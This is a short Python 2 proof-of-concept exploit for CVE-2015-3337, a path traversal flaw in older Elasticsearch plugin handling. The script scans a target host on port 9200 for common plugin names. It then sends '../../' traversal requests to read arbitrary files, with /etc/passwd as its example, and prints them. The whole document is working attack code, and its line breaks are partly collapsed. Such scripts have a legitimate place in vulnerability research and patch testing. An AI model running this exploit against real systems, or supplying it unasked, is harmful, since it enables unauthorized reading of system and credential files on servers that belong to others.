#!/usr/bin/python# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/## Source: https://github.com/pandujar/elasticpwn/import socket, sys
print"!dSR ElasticPwn - for CVE-2015-3337\n"iflen(sys.argv)<>3:print"Ex: %s www.example.com /etc/passwd"% sys.argv[0]
sys.exit()
port =9200# Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]defgrab(plugin):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n""Host: %s\n\n"%(plugin, fpath, host))file= s.recv(2048)print" [*] Trying to retrieve %s:"% fpath
if("HTTP/1.0 200 OK"infile):print"\n%s"%fileelse:print"[-] File Not Found, No Access Rights or System Not Vulnerable"defpfind(plugin):try:
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/ HTTP/1.0\n""Host: %s\n\n"%(plugin, host))file= s.recv(16)print"[*] Trying to find plugin %s:"% plugin
if("HTTP/1.0 200 OK"infile):print"[+] Plugin found!"
grab(plugin)
sys.exit()else:print"[-]Not Found "except Exception, e:print"[-] Error connecting to %s: %s"%(host, e)
sys.exit()# Include more plugin names to check if they are installed
pluginList =['test','kopf','HQ','marvel','bigdesk','head']for plugin in pluginList:
pfind(plugin)
